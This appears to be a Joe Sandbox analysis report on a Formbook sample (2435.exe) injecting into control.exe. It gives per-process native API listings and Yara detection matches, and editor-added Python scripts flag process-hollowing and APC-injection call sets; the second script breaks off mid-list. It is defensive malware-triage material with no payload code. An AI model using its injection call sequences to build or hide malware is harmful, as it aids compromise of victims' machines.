          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_1_00419D60 NtCreateFile
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_1_00419E10 NtReadFile
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_1_00419E90 NtClose
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_1_00419F40 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047795D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047796E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047796D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047799A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779560 NtWriteFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0477AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047795F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0477A770 NtOpenThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779760 NtOpenProcess
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0477A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047797A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0477B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047798F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047798A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047799D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779A20 NtResumeThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779A10 NtQuerySection
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0477A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FC9E90 NtClose
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FC9E10 NtReadFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FC9F40 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FC9D60 NtCreateFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FC9E8A NtClose
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FC9E0A NtReadFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FC9F3A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FC9D5A NtCreateFile
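The rows above are one "Code function" line per native call the sandbox found, attributed to a process index and an image (2435.exe as process 1, control.exe as process 9). What a reviewer actually wants from them is the per-process picture: which Nt* calls each process carries and whether the set adds up to a known injection primitive. The script below is an added example by the editor, not part of this report or of Joe Sandbox; it parses rows in the layout shown here (both the "Source | Code function" form and the raw flattened form the extraction produced, where the trailing reference column repeats the function id) and flags two call sets. The technique definitions in TECHNIQUES are the editor's assumptions about which calls belong together, not a sandbox signature, and the sample rows are a constructed subset copied from this report.

```python
"""Per-process triage of Joe Sandbox "Code function" rows.

Added example by the editor, not part of the report or of Joe Sandbox: it
groups the Nt* calls the sandbox attributed to each process and flags the
call sets that make up process hollowing and APC injection. The technique
definitions are the editor's own assumptions about which native calls a
reviewer should expect to see together, not a sandbox signature.
"""
import re
from collections import defaultdict

# Constructed sample: a subset of rows copied from this report, in both the
# separated form and the raw flattened form the extraction produced.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB99D0 NtCreateProcessEx",
    r"Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB97A0 NtUnmapViewOfSection,LdrInitializeThunk",
    r"Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9780 NtMapViewOfSection,LdrInitializeThunk",
    r"Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB98A0 NtWriteVirtualMemory",
    r"Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00ABAD30 NtSetContextThread",
    r"Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9A20 NtResumeThread,LdrInitializeThunk",
    r"Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9950 NtQueueApcThread",
    r"Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00ABA770 NtOpenThread",
    r"Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419D5A NtCreateFile,1_2_00419D5A",
    r"Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0477A770 NtOpenThread",
    r"Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779950 NtQueueApcThread",
    r"Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04779A20 NtResumeThread,LdrInitializeThunk",
    r"Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_004048530_2_00404853",
    r"Source: C:\Users\user\Desktop\2435.exe | Code function: 0_2_00406131",
]

# Assumed technique definitions: every call in the set must be present.
TECHNIQUES = [
    ("process hollowing", {"NtCreateProcessEx", "NtUnmapViewOfSection",
                           "NtMapViewOfSection", "NtWriteVirtualMemory",
                           "NtSetContextThread", "NtResumeThread"}),
    ("APC injection", {"NtOpenThread", "NtQueueApcThread", "NtResumeThread"}),
]

# Row layout: "Source: <image>[ |] Code function: <proc>_<dump>_<addr> <apis>[,<ref>]"
ROW_RE = re.compile(
    r"^Source:\s*(?P<src>.*?)\s*\|?\s*Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]{8})\s*(?P<tail>.*)$"
)


def parse_row(line):
    """Return (process index, image path, function id, [api names]) or None."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    fid = m.group("fid")
    proc = int(fid.split("_")[0])  # sandbox process index, not an OS PID
    apis = []
    for tok in m.group("tail").replace("|", ",").split(","):
        tok = tok.strip()
        # The trailing reference column repeats the function id; drop it.
        if tok and tok != fid:
            apis.append(tok)
    return proc, m.group("src"), fid, apis


def triage(rows):
    """Group Nt* calls per (process index, image) and flag technique sets."""
    procs = defaultdict(lambda: {"nt_apis": set(), "via_ldr": 0, "functions": 0})
    for line in rows:
        parsed = parse_row(line)
        if parsed is None:
            continue
        proc, image, _fid, apis = parsed
        rec = procs[(proc, image)]
        rec["functions"] += 1
        nt_calls = [a for a in apis if a.startswith("Nt")]
        rec["nt_apis"].update(nt_calls)
        # Count rows where the Nt* call is listed together with LdrInitializeThunk
        if nt_calls and "LdrInitializeThunk" in apis:
            rec["via_ldr"] += 1
    result = {}
    for key, rec in procs.items():
        found = [name for name, needed in TECHNIQUES if needed <= rec["nt_apis"]]
        result[key] = {
            "functions": rec["functions"],
            "nt_apis": sorted(rec["nt_apis"]),
            "via_ldr": rec["via_ldr"],
            "techniques": found,
        }
    return result


if __name__ == "__main__":
    for (proc, image), rec in sorted(triage(SAMPLE_ROWS).items()):
        print(f"[{proc}] {image}: {rec['functions']} functions, "
              f"{len(rec['nt_apis'])} Nt* calls ({rec['via_ldr']} with LdrInitializeThunk)")
        for name in rec["techniques"]:
            print(f"      -> {name}")
```

Run against the full row list from the report, process 1 (2435.exe) and process 9 (control.exe) both carry the complete hollowing set, which is what the "Sample uses process hollowing technique" and "Queues an APC in another process" verdicts in the signature list summarise; the process-0 rows carry no Nt* names at all and stay quiet, as they should.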
          Source: C:\Users\user\Desktop\2435.exe | Code function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\2435.exe | Code function: 0_2_00404853
          Source: C:\Users\user\Desktop\2435.exe | Code function: 0_2_00406131
          Source: C:\Users\user\Desktop\2435.exe | Code function: 0_2_73351A98
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_0041E1FC
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_0041D260
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_0041DA2A
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_0041BDC4
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00409E40
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00409E3C
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_0041D6DF
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_0041DFA3
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AA20A0
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B420A8
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00A8B090
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B428EC
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B4E824
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00A9A830
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B31002
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00A999BF
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00A94120
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00A7F900
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B422AE
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B34AEF
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B2FA2B
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AAEBB0
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B223E3
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B3DBD2
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B303DA
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AAABD8
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B42B28
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00A9A309
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00A9AB40
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B34496
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00A8841F
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B3D466
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AA2581
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B32D82
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00A8D5E0
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B425DD
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00A70D20
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B42D07
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B41D55
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B42EF7
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00A96E30
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B3D616
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B41FF1
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00B4DFCE
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_1_00401030
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_1_0041E1FC
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_1_0041D260
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_1_0041DA2A
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047FD466
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0474841F
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04730D20
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_048025DD
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04802D07
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0474D5E0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04801D55
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04762581
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04756E30
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047FD616
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04802EF7
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0480DFCE
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04801FF1
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_048020A8
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0475A830
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_048028EC
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047F1002
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0480E824
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047620A0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0474B090
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04754120
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0473F900
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047599BF
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_048022AE
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047EFA2B
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0475AB40
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0475A309
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047E23E3
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047F03DA
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_04802B28
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_047FDBD2
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0476ABD8
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0476EBB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FCE1FC
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FB9E40
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FB9E3C
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FB2FB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FCDFA3
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FCBDC4
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FB2D90
          Source: C:\Users\user\Desktop\2435.exe | Code function: String function: 00A7B150 appears 133 times
          Source: C:\Windows\SysWOW64\control.exe | Code function: String function: 0473B150 appears 90 times
          Source: 2435.exe, 00000000.00000003.228583086.0000000009C7F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 2435.exe
          Source: 2435.exe, 00000001.00000002.288731755.0000000000CFF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 2435.exe
          Source: 2435.exe, 00000001.00000002.288265327.00000000007E1000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameCONTROL.EXEj% vs 2435.exe
          Source: 2435.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
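The Yara rows above repeat the same two rules (Malpedia's Formbook_1 and JPCERT/CC's Formbook) across many memory dumps, which buries the useful information: in which process indices, at which base addresses and with which page protection the payload was found. The script below is an added example by the editor, not part of this report and not the Yara rules themselves (their bodies are not on this page). It parses the memory-dump and unpacked-PE match rows, groups matches by process index and region base, and lists the processes where the payload sits in executable memory. One assumption is baked in and labelled: in a dump name of the form <proc>.<dump>.<id>.<base>.<protect>.<type>.sdmp, the fifth field is taken to be the region's Win32 page-protection constant (0x04 PAGE_READWRITE, 0x40 PAGE_EXECUTE_READWRITE). The sample rows are copied from this report with the rule metadata shortened.

```python
"""Where the Formbook payload lives: summarising the Yara match rows.

Added example by the editor, not part of the report or of the Yara rules it
cites. It parses the memory-dump and unpacked-PE match rows, groups them by
sandbox process index and region base address, and reports which processes
hold the payload in executable memory. Assumption: in a dump name of the form
<proc>.<dump>.<id>.<base>.<protect>.<type>.sdmp the fifth field is the
Win32 page-protection constant of the region.
"""
import re
from collections import defaultdict

# Constructed sample: rows copied from this report (rule metadata shortened).
SAMPLE_MATCHES = [
    "Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein",
    "Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group",
    "Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein",
    "Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein",
    "Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group",
    "Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein",
    "Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group",
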